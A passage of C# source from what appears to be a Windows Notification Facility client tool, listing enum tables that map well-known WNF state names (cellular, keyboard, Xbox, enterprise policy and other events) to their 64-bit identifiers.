WNF_SEB_SYSTEM_IDLE = 0x41840B3EA3BC4875UL,
WNF_SEB_SYSTEM_LPE = 0x41840B3EA3BC9875UL,
WNF_SEB_SYSTEM_MAINTENANCE = 0x41840B3EA3BCA875UL,
WNF_SEB_TIME_ZONE_CHANGE = 0x41840B3EA3BC3875UL,
WNF_SEB_USER_PRESENT = 0x41840B3EA3BC6875UL,
WNF_SEB_VOICEMAIL_CHANGED = 0x41840B3EA3BD5875UL,
WNF_SHEL_DEVICE_UNLOCKED = 0x0D83063EA3BCC075UL,
WNF_SHEL_PLACES_CHANGED = 0x0D83063EA3BCC875UL,
WNF_SHR_DHCP_IPv4_LEASE_LIST = 0x4194063EA3BC1075UL,
WNF_SHR_SHARING_CHANGED = 0x4194063EA3BC0835UL,
WNF_SKYD_FILE_SYNC = 0x059F053EA3BC0875UL,
WNF_SKYD_QUOTA_CHANGE = 0x059F053EA3BC1075UL,
WNF_SMS_CHECK_ACCESS = 0x4195033EA3BC0875UL,
WNF_SMSS_MEMORY_COOLING_COMPATIBLE = 0x1295033EA3BC0875UL,
WNF_SPAC_SPACEPORT_COMPREHENSIVE_WNF_STATE = 0x02871E3EA3BC0875UL,
WNF_SPI_LOGICALDPIOVERRIDE = 0x418F1E3EA3BC0835UL,
WNF_SRT_WINRE_CONFIGURATION_CHANGE = 0x41921C3EA3BC0875UL,
WNF_STOR_CONFIGURATION_DEVICE_INFO_UPDATED = 0x13891A3EA3BC0875UL,
WNF_STOR_CONFIGURATION_MO_TASK_RUNNING = 0x13891A3EA3BC1075UL,
WNF_STOR_CONFIGURATION_OEM_TASK_RUNNING = 0x13891A3EA3BC1875UL,
WNF_TB_SYSTEM_TIME_CHANGED = 0x41C60C39A3BC0875UL,
WNF_TETH_TETHERING_STATE = 0x09920B39A3BC0875UL,
WNF_TKBN_AUTOCOMPLETE = 0x0F840539A3BC4835UL,
WNF_TKBN_CANDIDATE_WINDOW_STATE = 0x0F840539A3BC7835UL,
WNF_TKBN_CARET_TRACKING = 0x0F840539A3BC4035UL,
WNF_TKBN_COMPOSITION_STATE = 0x0F840539A3BC9035UL,
WNF_TKBN_DESKTOP_MODE_AUTO_IHM = 0x0F840539A3BCB035UL,
WNF_TKBN_FOREGROUND_WINDOW = 0x0F840539A3BC3835UL,
WNF_TKBN_IMMERSIVE_FOCUS_TRACKING = 0x0F840539A3BC1835UL,
WNF_TKBN_INPUT_PANE_DISPLAY_POLICY = 0x0F840539A3BCA835UL,
WNF_TKBN_KEYBOARD_GESTURE = 0x0F840539A3BC6835UL,
WNF_TKBN_KEYBOARD_LAYOUT_CHANGE = 0x0F840539A3BC8035UL,
WNF_TKBN_KEYBOARD_VIEW_CHANGE = 0x0F840539A3BC5835UL,
WNF_TKBN_KEYBOARD_VISIBILITY = 0x0F840539A3BC0835UL,
WNF_TKBN_LANGUAGE = 0x0F840539A3BC3035UL,
WNF_TKBN_MODERN_KEYBOARD_FOCUS_TRACKING = 0x0F840539A3BC5035UL,
WNF_TKBN_RESTRICTED_KEYBOARD_GESTURE = 0x0F840539A3BC7035UL,
WNF_TKBN_RESTRICTED_KEYBOARD_LAYOUT_CHANGE = 0x0F840539A3BC8835UL,
WNF_TKBN_RESTRICTED_KEYBOARD_VIEW_CHANGE = 0x0F840539A3BC6035UL,
WNF_TKBN_RESTRICTED_KEYBOARD_VISIBILITY = 0x0F840539A3BC1035UL,
WNF_TKBN_RESTRICTED_TOUCH_EVENT = 0x0F840539A3BC2835UL,
WNF_TKBN_SYSTEM_IMMERSIVE_FOCUS_TRACKING = 0x0F840539A3BC9835UL,
WNF_TKBN_SYSTEM_TOUCH_EVENT = 0x0F840539A3BCA035UL,
WNF_TKBN_TOUCH_EVENT = 0x0F840539A3BC2035UL,
WNF_TKBR_CHANGE_SYSTEM = 0x13840539A3BC08F5UL,
WNF_TMCN_ISTABLETMODE = 0x0F850339A3BC0875UL,
WNF_TOPE_INP_POINTER_DEVICE_ACTIVITY = 0x04960139A3BC0875UL,
WNF_TPM_DEVICEID_STATE = 0x418B1E39A3BC1075UL,
WNF_TPM_OWNERSHIP_TAKEN = 0x418B1E39A3BC0875UL,
WNF_TPM_PROVISION_TRIGGER = 0x418B1E39A3BC1875UL,
WNF_TZ_LEGACY_STORE_CHANGED = 0x41C61439A3BC0875UL,
WNF_TZ_STORE_CHANGED = 0x41C61439A3BC1075UL,
WNF_TZ_TIMEZONE_CHANGED = 0x41C61439A3BC1875UL,
WNF_UBPM_CONSOLE_MONITOR = 0x0C960C38A3BC1075UL,
WNF_UBPM_FRMU_ALLOWED = 0x0C960C38A3BC1875UL,
WNF_UBPM_POWER_SOURCE = 0x0C960C38A3BC0875UL,
WNF_UBPM_PRESHUTDOWN_PHASE = 0x0C960C38A3BC2075UL,
WNF_UDA_APPOINTMENT_CHANGED = 0x41870A38A3BC1835UL,
WNF_UDA_CALENDAR_FOLDER_ISHIDDEN_CHANGED = 0x41870A38A3BC1035UL,
WNF_UDA_CONTACT_SORT_CHANGED = 0x41870A38A3BC2835UL,
WNF_UDA_STORE_CHANGED = 0x41870A38A3BC0835UL,
WNF_UDA_TASK_CHANGED = 0x41870A38A3BC2035UL,
WNF_UDM_SERVICE_INITIALIZED = 0x418B0A38A3BC0835UL,
WNF_UMDF_WUDFSVC_START = 0x07820338A3BC0875UL,
WNF_UMGR_SIHOST_READY = 0x13810338A3BC0835UL,
WNF_UMGR_USER_LOGIN = 0x13810338A3BC1075UL,
WNF_UMGR_USER_LOGOUT = 0x13810338A3BC1875UL,
WNF_USB_BILLBOARD_DEVICE_STATE = 0x41841D38A3BC1075UL,
WNF_USB_CHARGING_STATE = 0x41841D38A3BC2075UL,
WNF_USB_FUNCTION_CONTROLLER_STATE = 0x41841D38A3BC2875UL,
WNF_USB_PEER_DEVICE_STATE = 0x41841D38A3BC1875UL,
WNF_USB_TYPE_C_PARTNER_STATE = 0x41841D38A3BC0875UL,
WNF_USO_ACTIVE_SESSION = 0x41891D38A3BC2875UL,
WNF_USO_REBOOT_REQUIRED = 0x41891D38A3BC2075UL,
WNF_USO_STATE_ATTENTION_REQUIRED = 0x41891D38A3BC1075UL,
WNF_USO_STATE_CHANGE = 0x41891D38A3BC0875UL,
WNF_USO_UPDATE_PROGRESS = 0x41891D38A3BC1875UL,
WNF_USO_UPDATE_SUCCEEDED = 0x41891D38A3BC3075UL,
WNF_UTS_LOCKSCREEN_DISMISSAL_TRIGGERED = 0x41951A38A3BC1475UL,
WNF_UTS_USERS_ENROLLED = 0x41951A38A3BC0C75UL,
WNF_VAN_VANUI_STATUS = 0x41880F3BA3BC0875UL,
WNF_WCM_INTERFACE_LIST = 0x418B0D3AA3BC0875UL,
WNF_WCM_MAPPING_POLICY_UPDATED = 0x418B0D3AA3BC1875UL,
WNF_WCM_PROFILE_CONFIG_UPDATED = 0x418B0D3AA3BC2075UL,
WNF_WCM_SERVICE_STATUS = 0x418B0D3AA3BC1075UL,
WNF_WER_QUEUED_REPORTS = 0x41940B3AA3BC1075UL,
WNF_WER_SERVICE_START = 0x41940B3AA3BC0875UL,
WNF_WHTP_WINHTTP_PROXY_DISCOVERED = 0x1192063AA3BC0875UL,
WNF_WIFI_AOAC_STATUS = 0x0880073AA3BC4875UL,
WNF_WIFI_AVERAGE_TRANSMIT = 0x0880073AA3BC6875UL,
WNF_WIFI_CONNECTION_SCORE = 0x0880073AA3BC5875UL,
WNF_WIFI_CONNECTION_STATUS = 0x0880073AA3BC0875UL,
WNF_WIFI_CPL_STATUS = 0x0880073AA3BC1075UL,
WNF_WIFI_HOTSPOT_HOST_READY = 0x0880073AA3BC2875UL,
WNF_WIFI_L3_AUTH_STATE = 0x0880073AA3BC8075UL,
WNF_WIFI_MEDIA_STREAMING_MODE = 0x0880073AA3BC7075UL,
WNF_WIFI_SERVICE_NOTIFICATIONS = 0x0880073AA3BC2075UL,
WNF_WIFI_TASK_TRIGGER = 0x0880073AA3BC7875UL,
WNF_WIFI_TILE_UPDATE = 0x0880073AA3BC6075UL,
WNF_WNS_CONNECTIVITY_STATUS = 0x4195003AA3BC0875UL,
WNF_WOF_OVERLAY_CONFIGURATION_CHANGE = 0x4180013AA3BC0875UL,
WNF_WSQM_IS_OPTED_IN = 0x0C971D3AA3BC0875UL,
WNF_WUA_AU_SCAN_COMPLETE = 0x41871B3AA3BC1075UL,
WNF_WUA_CALL_HANG = 0x41871B3AA3BC1875UL,
WNF_WUA_NUM_PER_USER_UPDATES = 0x41871B3AA3BC08F5UL,
WNF_WUA_SERVICE_HANG = 0x41871B3AA3BC2075UL,
WNF_WUA_STAGEUPDATE_DETAILS = 0x41871B3AA3BC2875UL,
WNF_XBOX_ACHIEVEMENTS_RAW_NOTIFICATION_RECEIVED = 0x19890C35A3BC8075UL,
WNF_XBOX_ACTIVE_APPLICATION_CHANGED = 0x19890C35A3BC1875UL,
WNF_XBOX_APP_BAND_FOCUS_TOGGLED = 0x19890C35A3BCA875UL,
WNF_XBOX_APPLICATION_COM_RESILIENCY_STATUS_CHANGED = 0x19890C35A3BCD875UL,
WNF_XBOX_APPLICATION_CONTEXT_CHANGED = 0x19890C35A3BC0875UL,
WNF_XBOX_APPLICATION_ERROR = 0x19890C35A3BC6075UL,
WNF_XBOX_APPLICATION_FOCUS_CHANGED = 0x19890C35A3BC1075UL,
WNF_XBOX_APPLICATION_LAYOUT_CHANGED = 0x19890C35A3BC9075UL,
WNF_XBOX_APPLICATION_LICENSE_CHANGED = 0x19890C35A3BD0075UL,
WNF_XBOX_APPLICATION_NO_LONGER_RUNNING = 0x19890C35A3BC5075UL,
WNF_XBOX_AUTOPLAY_CONTENT_DETECTED = 0x19890C35A3BC5875UL,
WNF_XBOX_ERA_VM_STATUS_CHANGED = 0x19890C35A3BC8875UL,
WNF_XBOX_EXIT_SILENT_BOOT_MODE = 0x19890C35A3BCF875UL,
WNF_XBOX_GLOBALIZATION_SETTING_CHANGED = 0x19890C35A3BC4875UL,
WNF_XBOX_HOST_STORAGE_CONFIGURATION_CHANGED = 0x19890C35A3BCF075UL,
WNF_XBOX_INPUT_ACTIVITY_RESUME = 0x19890C35A3BCD075UL,
WNF_XBOX_INPUT_IDLE_CHECKPOINT = 0x19890C35A3BCC075UL,
WNF_XBOX_INPUT_IDLE_SHUTDOWN = 0x19890C35A3BCC875UL,
WNF_XBOX_INPUT_RECEIVED = 0x19890C35A3BCB875UL,
WNF_XBOX_LIVE_CONNECTIVITY_CHANGED = 0x19890C35A3BC7075UL,
WNF_XBOX_MSA_ENVIRONMENT_CONFIGURED = 0x19890C35A3BD2075UL,
WNF_XBOX_PACKAGE_INSTALL_STATE_CHANGED = 0x19890C35A3BC3875UL,
WNF_XBOX_PACKAGE_UNMOUNTED_FROM_SYSTEM_FOR_LAUNCH = 0x19890C35A3BC3075UL,
WNF_XBOX_PASS3_UPDATE_NOTIFICATION = 0x19890C35A3BD1875UL,
WNF_XBOX_SHELL_INITIALIZED = 0x19890C35A3BD0875UL,
WNF_XBOX_SHELL_TOAST_NOTIFICATION = 0x19890C35A3BC2875UL,
WNF_XBOX_SIP_FOCUS_TRANSFER_NOTIFICATION = 0x19890C35A3BD3875UL,
WNF_XBOX_SIP_VISIBILITY_CHANGED = 0x19890C35A3BD2875UL,
WNF_XBOX_STORAGE_ERROR = 0x19890C35A3BC6875UL,
WNF_XBOX_SYSTEM_CONSTRAINED_MODE_STATUS_CHANGED = 0x19890C35A3BCA075UL,
WNF_XBOX_SYSTEM_GAME_STREAMING_STATE_CHANGED = 0x19890C35A3BD3075UL,
WNF_XBOX_SYSTEM_IDLE_TIMEOUT_CHANGED = 0x19890C35A3BC9875UL,
WNF_XBOX_SYSTEM_TITLE_AUTH_STATUS_CHANGED = 0x19890C35A3BC7875UL,
WNF_XBOX_SYSTEM_USER_CONTEXT_CHANGED = 0x19890C35A3BCE075UL,
WNF_XBOX_SYSTEMUI_APP_LAUNCHED = 0x19890C35A3BCB075UL,
WNF_XBOX_TILE_CHANGED = 0x19890C35A3BD1075UL,
WNF_XBOX_XAM_READY_FOR_DEVKIT_REBOOT = 0x19890C35A3BCE875UL
}
}
================================================
FILE: SharpWnfSuite/SharpWnfClient/Interop/WellKnownStateName1511.cs
================================================
namespace SharpWnfClient.Interop
{
internal enum WELL_KNOWN_WNF_NAME_1511 : ulong
{
WNF_BI_BI_READY = 0x41C6072FA3BC6835UL,
WNF_BI_EVENT_DELETION = 0x41C6072FA3BC5075UL,
WNF_BI_LOCK_SCREEN_UPDATE_CHANNEL = 0x41C6072FA3BC4875UL,
WNF_BI_NOTIFY_NEW_SESSION = 0x41C6072FA3BC7075UL,
WNF_BI_PSM_TEST_HOOK_CHANNEL = 0x41C6072FA3BC5875UL,
WNF_BI_QUIET_MODE_UPDATE_CHANNEL = 0x41C6072FA3BC6075UL,
WNF_CAPS_CENTRAL_ACCESS_POLICIES_CHANGED = 0x12960F2EA3BC0875UL,
WNF_CCTL_BUTTON_REQUESTS = 0x0D920D2EA3BC08B5UL,
WNF_CDP_CDPSVC_READY = 0x41960A2EA3BC0875UL,
WNF_CDP_CDPSVC_STOPPING = 0x41960A2EA3BC1075UL,
WNF_CELL_AIRPLANEMODE = 0x0D8A0B2EA3BC3075UL,
WNF_CELL_AIRPLANEMODE_DETAILS = 0x0D8A0B2EA3BC9075UL,
WNF_CELL_AVAILABLE_OPERATORS_CAN0 = 0x0D8A0B2EA3BC5075UL,
WNF_CELL_AVAILABLE_OPERATORS_CAN1 = 0x0D8A0B2EA3BD5875UL,
WNF_CELL_CALLFORWARDING_STATUS_CAN0 = 0x0D8A0B2EA3BD0075UL,
WNF_CELL_CALLFORWARDING_STATUS_CAN1 = 0x0D8A0B2EA3BDE075UL,
WNF_CELL_CAN_CONFIGURATION_SET_COMPLETE_MODEM0 = 0x0D8A0B2EA3BE5875UL,
WNF_CELL_CAN_STATE_CAN0 = 0x0D8A0B2EA3BC8075UL,
WNF_CELL_CAN_STATE_CAN1 = 0x0D8A0B2EA3BD9075UL,
WNF_CELL_CDMA_ACTIVATION_CAN0 = 0x0D8A0B2EA3BC4075UL,
WNF_CELL_CDMA_ACTIVATION_CAN1 = 0x0D8A0B2EA3BD4875UL,
WNF_CELL_CONFIGURED_LINES_CAN0 = 0x0D8A0B2EA3BDF475UL,
WNF_CELL_CONFIGURED_LINES_CAN1 = 0x0D8A0B2EA3BDFC75UL,
WNF_CELL_CSP_WWAN_PLUS_READYNESS = 0x0D8A0B2EA3BCF875UL,
WNF_CELL_DATA_ENABLED_BY_USER_MODEM0 = 0x0D8A0B2EA3BC6475UL,
WNF_CELL_DEVICE_INFO_CAN0 = 0x0D8A0B2EA3BC5875UL,
WNF_CELL_DEVICE_INFO_CAN1 = 0x0D8A0B2EA3BD6075UL,
WNF_CELL_EMERGENCY_CALLBACK_MODE_STATUS = 0x0D8A0B2EA3BE6875UL,
WNF_CELL_HOME_OPERATOR_CAN0 = 0x0D8A0B2EA3BCC075UL,
WNF_CELL_HOME_OPERATOR_CAN1 = 0x0D8A0B2EA3BDA875UL,
WNF_CELL_HOME_PRL_ID_CAN0 = 0x0D8A0B2EA3BCC875UL,
WNF_CELL_HOME_PRL_ID_CAN1 = 0x0D8A0B2EA3BDB075UL,
WNF_CELL_IMS_STATUS_CAN0 = 0x0D8A0B2EA3BE8075UL,
WNF_CELL_IMS_STATUS_CAN1 = 0x0D8A0B2EA3BE8875UL,
WNF_CELL_IMSI_CAN0 = 0x0D8A0B2EA3BE2075UL,
WNF_CELL_IMSI_CAN1 = 0x0D8A0B2EA3BE2875UL,
WNF_CELL_IWLAN_AVAILABILITY_CAN0 = 0x0D8A0B2EA3BE9075UL,
WNF_CELL_IWLAN_AVAILABILITY_CAN1 = 0x0D8A0B2EA3BE9875UL,
WNF_CELL_LEGACY_SETTINGS_MIGRATION = 0x0D8A0B2EA3BE3075UL,
WNF_CELL_NETWORK_TIME_CAN0 = 0x0D8A0B2EA3BC4875UL,
WNF_CELL_NETWORK_TIME_CAN1 = 0x0D8A0B2EA3BD5075UL,
WNF_CELL_OPERATOR_NAME_CAN0 = 0x0D8A0B2EA3BC3875UL,
WNF_CELL_OPERATOR_NAME_CAN1 = 0x0D8A0B2EA3BD4075UL,
WNF_CELL_PERSO_STATUS_CAN0 = 0x0D8A0B2EA3BCB875UL,
WNF_CELL_PERSO_STATUS_CAN1 = 0x0D8A0B2EA3BDE875UL,
WNF_CELL_PHONE_NUMBER_CAN0 = 0x0D8A0B2EA3BC6875UL,
WNF_CELL_PHONE_NUMBER_CAN1 = 0x0D8A0B2EA3BD7075UL,
WNF_CELL_POSSIBLE_DATA_ACTIVITY_CHANGE_MODEM0 = 0x0D8A0B2EA3BC9875UL,
WNF_CELL_POWER_STATE_MODEM0 = 0x0D8A0B2EA3BC0875UL,
WNF_CELL_PREFERRED_LANGUAGES_SLOT0 = 0x0D8A0B2EA3BE1075UL,
WNF_CELL_PREFERRED_LANGUAGES_SLOT1 = 0x0D8A0B2EA3BE1875UL,
WNF_CELL_RADIO_TYPE_MODEM0 = 0x0D8A0B2EA3BD0C75UL,
WNF_CELL_REGISTRATION_CHANGED_TRIGGER_MV = 0x0D8A0B2EA3BE6075UL,
WNF_CELL_REGISTRATION_PREFERENCES_CAN0 = 0x0D8A0B2EA3BC7C75UL,
WNF_CELL_REGISTRATION_PREFERENCES_CAN1 = 0x0D8A0B2EA3BD8C75UL,
WNF_CELL_REGISTRATION_STATUS_CAN0 = 0x0D8A0B2EA3BC2075UL,
WNF_CELL_REGISTRATION_STATUS_CAN1 = 0x0D8A0B2EA3BD2075UL,
WNF_CELL_REGISTRATION_STATUS_DETAILS_CAN0 = 0x0D8A0B2EA3BCA875UL,
WNF_CELL_REGISTRATION_STATUS_DETAILS_CAN1 = 0x0D8A0B2EA3BD9875UL,
WNF_CELL_SIGNAL_STRENGTH_BARS_CAN0 = 0x0D8A0B2EA3BC1075UL,
WNF_CELL_SIGNAL_STRENGTH_BARS_CAN1 = 0x0D8A0B2EA3BD1075UL,
WNF_CELL_SIGNAL_STRENGTH_DETAILS_CAN0 = 0x0D8A0B2EA3BE7075UL,
WNF_CELL_SIGNAL_STRENGTH_DETAILS_CAN1 = 0x0D8A0B2EA3BE7875UL,
WNF_CELL_SUPPORTED_SYSTEM_TYPES_CAN0 = 0x0D8A0B2EA3BCB075UL,
WNF_CELL_SUPPORTED_SYSTEM_TYPES_CAN1 = 0x0D8A0B2EA3BDA075UL,
WNF_CELL_SYSTEM_CONFIG = 0x0D8A0B2EA3BCA475UL,
WNF_CELL_SYSTEM_TYPE_CAN0 = 0x0D8A0B2EA3BC1875UL,
WNF_CELL_SYSTEM_TYPE_CAN1 = 0x0D8A0B2EA3BD1875UL,
WNF_CELL_UICC_ATR_SLOT0 = 0x0D8A0B2EA3BE3875UL,
WNF_CELL_UICC_ATR_SLOT1 = 0x0D8A0B2EA3BE4075UL,
WNF_CELL_UICC_SIMSEC_SLOT0 = 0x0D8A0B2EA3BE4875UL,
WNF_CELL_UICC_SIMSEC_SLOT1 = 0x0D8A0B2EA3BE5075UL,
WNF_CELL_UICC_STATUS_DETAILS_SLOT0 = 0x0D8A0B2EA3BE0075UL,
WNF_CELL_UICC_STATUS_DETAILS_SLOT1 = 0x0D8A0B2EA3BE0875UL,
WNF_CELL_UICC_STATUS_SLOT0 = 0x0D8A0B2EA3BC2875UL,
WNF_CELL_UICC_STATUS_SLOT1 = 0x0D8A0B2EA3BD2875UL,
WNF_CELL_USER_PREFERRED_POWER_STATE_MODEM0 = 0x0D8A0B2EA3BC8C75UL,
WNF_CELL_UTK_PROACTIVE_CMD = 0x0D8A0B2EA3BCF075UL,
WNF_CELL_UTK_SETUP_MENU_SLOT0 = 0x0D8A0B2EA3BCE875UL,
WNF_CELL_UTK_SETUP_MENU_SLOT1 = 0x0D8A0B2EA3BDD075UL,
WNF_CELL_VOICEMAIL_NUMBER_CAN0 = 0x0D8A0B2EA3BC7075UL,
WNF_CFCL_SC_CONFIGURATIONS_ADDED = 0x0D85082EA3BC1875UL,
WNF_CFCL_SC_CONFIGURATIONS_CHANGED = 0x0D85082EA3BC0875UL,
WNF_CFCL_SC_CONFIGURATIONS_DELETED = 0x0D85082EA3BC1075UL,
WNF_CLIP_CONTENT_CHANGED = 0x118F022EA3BC0875UL,
WNF_CNET_CELLULAR_CONNECTIONS_AVAILABLE = 0x1583002EA3BC4875UL,
WNF_CNET_DPU_GLOBAL_STATE_NOT_TRACKED = 0x1583002EA3BC3075UL,
WNF_CNET_DPU_GLOBAL_STATE_OFF_TRACK = 0x1583002EA3BC1875UL,
WNF_CNET_DPU_GLOBAL_STATE_ON_TRACK = 0x1583002EA3BC2075UL,
WNF_CNET_DPU_GLOBAL_STATE_OVER_LIMIT = 0x1583002EA3BC1075UL,
WNF_CNET_DPU_GLOBAL_STATE_UNDER_TRACK = 0x1583002EA3BC2875UL,
WNF_CNET_NON_CELLULAR_CONNECTED = 0x1583002EA3BC6875UL,
WNF_CNET_NON_CELLULAR_CONNECTIONS_AVAILABLE = 0x1583002EA3BC5075UL,
WNF_CNET_RADIO_ACTIVITY_OR_NON_CELLULAR_CONNECTED = 0x1583002EA3BC7075UL,
WNF_CSC_SERVICE_START = 0x41851D2EA3BC0875UL,
WNF_DBA_DEVICE_ACCESS_CHANGED = 0x41870C29A3BC0875UL,
WNF_DEP_OOBE_COMPLETE = 0x41960B29A3BC0C75UL,
WNF_DEP_UNINSTALL_DISABLED = 0x41960B29A3BC1475UL,
WNF_DICT_CONTENT_CHANGED = 0x15850729A3BC0875UL,
WNF_DISK_SCRUB_REQUIRED = 0x0A950729A3BC0875UL,
WNF_DMF_MIGRATION_COMPLETE = 0x41800329A3BC1075UL,
WNF_DMF_MIGRATION_PROGRESS = 0x41800329A3BC1875UL,
WNF_DMF_MIGRATION_STARTED = 0x41800329A3BC0875UL,
WNF_DMF_UX_COMPLETE = 0x41800329A3BC2075UL,
WNF_DNS_ALL_SERVER_TIMEOUT = 0x41950029A3BC1075UL,
WNF_DSM_DSMAPPINSTALLED = 0x418B1D29A3BC0C75UL,
WNF_DSM_DSMAPPREMOVED = 0x418B1D29A3BC1475UL,
WNF_DUSM_TASK_TOAST = 0x0C951B29A3BC0875UL,
WNF_DX_DEVICE_REMOVAL = 0x41C61629A3BC60B5UL,
WNF_DX_DISPLAY_CONFIG_CHANGE_NOTIFICATION = 0x41C61629A3BC5835UL,
WNF_DX_HARDWARE_CONTENT_PROTECTION_TILT_NOTIFICATION = 0x41C61629A3BC4075UL,
WNF_DX_INTERNAL_PANEL_DIMENSIONS = 0x41C61629A3BC4875UL,
WNF_DX_MODE_CHANGE_NOTIFICATION = 0x41C61629A3BC1035UL,
WNF_DX_MODERN_OUTPUTDUPLICATION = 0x41C61629A3BC5035UL,
WNF_DX_MONITOR_CHANGE_NOTIFICATION = 0x41C61629A3BC2835UL,
WNF_DX_NETWORK_DISPLAY_STATE_CHANGE_NOTIFICATION = 0x41C61629A3BC2035UL,
WNF_DX_OCCLUSION_CHANGE_NOTIFICATION = 0x41C61629A3BC1835UL,
WNF_DX_STEREO_CONFIG = 0x41C61629A3BC0C75UL,
WNF_DX_VIDMM_BUDGETCHANGE_NOTIFICATION = 0x41C61629A3BC3875UL,
WNF_DX_VIDMM_TRIM_NOTIFICATION = 0x41C61629A3BC30B5UL,
WNF_DXGK_ADAPTER_TDR_NOTIFICATION = 0x0A811629A3BC0875UL,
WNF_EDP_AAD_REAUTH_REQUIRED = 0x41960A28A3BC3835UL,
WNF_EDP_APP_UI_ENTERPRISE_CONTEXT_CHANGED = 0x41960A28A3BC3035UL,
WNF_EDP_CLIPBOARD_METADATA_CHANGED = 0x41960A28A3BC2035UL,
WNF_EDP_DIALOG_CANCEL = 0x41960A28A3BC2835UL,
WNF_EDP_DPL_KEYS_STATE = 0x41960A28A3BC1875UL,
WNF_EDP_ENTERPRISE_CONTEXTS_UPDATED = 0x41960A28A3BC4075UL,
WNF_EDP_IDENTITY_REVOKED = 0x41960A28A3BC10F5UL,
WNF_EDP_TAGGED_APP_LAUNCHED = 0x41960A28A3BC0835UL,
WNF_EFS_SERVICE_START = 0x41950828A3BC0875UL,
WNF_ENTR_ABOVELOCK_POLICY_VALUE_CHANGED = 0x13920028A3BC7875UL,
WNF_ENTR_ACCOUNTS_POLICY_VALUE_CHANGED = 0x13920028A3BC3075UL,
WNF_ENTR_ALLOW_WBA_EXECUTION_POLICY_VALUE_CHANGED = 0x13920028A3BD3875UL,
WNF_ENTR_ALLOWALLTRUSTEDAPPS_POLICY_VALUE_CHANGED = 0x13920028A3BCF875UL,
WNF_ENTR_ALLOWAPPLICATIONS_POLICY_VALUE_CHANGED = 0x13920028A3BC8075UL,
WNF_ENTR_ALLOWCELLULARDATA_POLICY_VALUE_CHANGED = 0x13920028A3BD5075UL,
WNF_ENTR_ALLOWCELLULARDATAROAMING_POLICY_VALUE_CHANGED = 0x13920028A3BD4875UL,
WNF_ENTR_ALLOWDEVELOPERUNLOCK_POLICY_VALUE_CHANGED = 0x13920028A3BD1875UL,
WNF_ENTR_ALLOWINPUTPANEL_POLICY_VALUE_CHANGED = 0x13920028A3BCA875UL,
WNF_ENTR_ALLOWNONMICROSOFTSIGNEDUPDATE_POLICY_VALUE_CHANGED = 0x13920028A3BD3075UL,
WNF_ENTR_ALLOWSHAREDUSERDATA_POLICY_VALUE_CHANGED = 0x13920028A3BD0075UL,
WNF_ENTR_ALLOWUPDATESERVICE_POLICY_VALUE_CHANGED = 0x13920028A3BD2075UL,
WNF_ENTR_APPLICATIONMANAGEMENT_POLICY_VALUE_CHANGED = 0x13920028A3BC5875UL,
WNF_ENTR_BLUETOOTH_POLICY_VALUE_CHANGED = 0x13920028A3BCD875UL,
WNF_ENTR_BROWSER_POLICY_VALUE_CHANGED = 0x13920028A3BC4075UL,
WNF_ENTR_CAMERA_POLICY_VALUE_CHANGED = 0x13920028A3BC5075UL,
WNF_ENTR_CONNECTIVITY_POLICY_VALUE_CHANGED = 0x13920028A3BC2075UL,
WNF_ENTR_CONTEXT_STATE_CHANGE = 0x13920028A3BC9875UL,
WNF_ENTR_DEVICELOCK_POLICY_VALUE_CHANGED = 0x13920028A3BC0875UL,
WNF_ENTR_DOMAIN_NAMES_FOR_EMAIL_SYNC_POLICY_VALUE_CHANGED = 0x13920028A3BD4075UL,
WNF_ENTR_EDPENFORCEMENTLEVEL_POLICY_VALUE_CHANGED = 0x13920028A3BC8875UL,
WNF_ENTR_EDPNETWORKING_POLICY_VALUE_CHANGED = 0x13920028A3BCE075UL,
WNF_ENTR_EXPERIENCE_POLICY_VALUE_CHANGED = 0x13920028A3BC2875UL,
WNF_ENTR_PUSH_NOTIFICATION_RECEIVED = 0x13920028A3BC6875UL,
WNF_ENTR_PUSH_RECEIVED = 0x13920028A3BCA075UL,
WNF_ENTR_REQUIRE_DEVICE_ENCRYPTION_POLICY_VALUE_CHANGED = 0x13920028A3BC6075UL,
WNF_ENTR_REQUIRE_DPL_POLICY_VALUE_CHANGED = 0x13920028A3BCE875UL,
WNF_ENTR_RESTRICTAPPDATATOSYTEMVOLUME_POLICY_VALUE_CHANGED = 0x13920028A3BD1075UL,
WNF_ENTR_RESTRICTAPPTOSYTEMVOLUME_POLICY_VALUE_CHANGED = 0x13920028A3BD0875UL,
WNF_ENTR_SEARCH_ALLOW_INDEXING_ENCRYPTED_STORES_OR_ITEMS = 0x13920028A3BCD075UL,
WNF_ENTR_SEARCH_ALLOW_USING_DIACRITICS = 0x13920028A3BCB075UL,
WNF_ENTR_SEARCH_ALWAYS_USE_AUTO_LANG_DETECTION = 0x13920028A3BCB875UL,
WNF_ENTR_SEARCH_DISABLE_REMOVABLE_DRIVE_INDEXING = 0x13920028A3BCC075UL,
WNF_ENTR_SEARCH_POLICY_VALUE_CHANGED = 0x13920028A3BC7075UL,
WNF_ENTR_SEARCH_PREVENT_INDEXING_LOW_DISK_SPACE_MB = 0x13920028A3BCC875UL,
WNF_ENTR_SECURITY_POLICY_VALUE_CHANGED = 0x13920028A3BC3875UL,
WNF_ENTR_SYSTEM_POLICY_VALUE_CHANGED = 0x13920028A3BC1875UL,
WNF_ENTR_UPDATE_POLICY_VALUE_CHANGED = 0x13920028A3BC4875UL,
WNF_ENTR_UPDATESERVICEURL_POLICY_VALUE_CHANGED = 0x13920028A3BD2875UL,
WNF_ENTR_WAP_MESSAGE_FOR_DMWAPPUSHSVC_READY = 0x13920028A3BC9075UL,
WNF_ENTR_WIFI_POLICY_VALUE_CHANGED = 0x13920028A3BC1075UL,
WNF_ENTR_WINDOWS_DEFENDER_POLICY_VALUE_CHANGED = 0x13920028A3BCF075UL,
WNF_ETW_SUBSYSTEM_INITIALIZED = 0x41911A28A3BC0875UL,
WNF_EXEC_OSTASKCOMPLETION_REVOKED = 0x02831628A3BC0875UL,
WNF_EXEC_THERMAL_LIMITER_CLOSE_APPLICATION_VIEWS = 0x02831628A3BC1875UL,
WNF_EXEC_THERMAL_LIMITER_DISPLAY_WARNING = 0x02831628A3BC2875UL,
WNF_EXEC_THERMAL_LIMITER_STOP_MRC = 0x02831628A3BC3075UL,
WNF_EXEC_THERMAL_LIMITER_TERMINATE_BACKGROUND_TASKS = 0x02831628A3BC2075UL,
WNF_FDBK_QUESTION_NOTIFICATION = 0x0A840A2BA3BC0875UL,
WNF_FLT_RUNDOWN_WAIT = 0x4192022BA3BC0875UL,
WNF_FLYT_IDS_CHANGED = 0x159F022BA3BC0875UL,
WNF_FOD_STATE_CHANGE = 0x4182012BA3BC0875UL,
WNF_FSRL_OPLOCK_BREAK = 0x0D941D2BA3BC1075UL,
WNF_FSRL_TIERED_VOLUME_DETECTED = 0x0D941D2BA3BC0875UL,
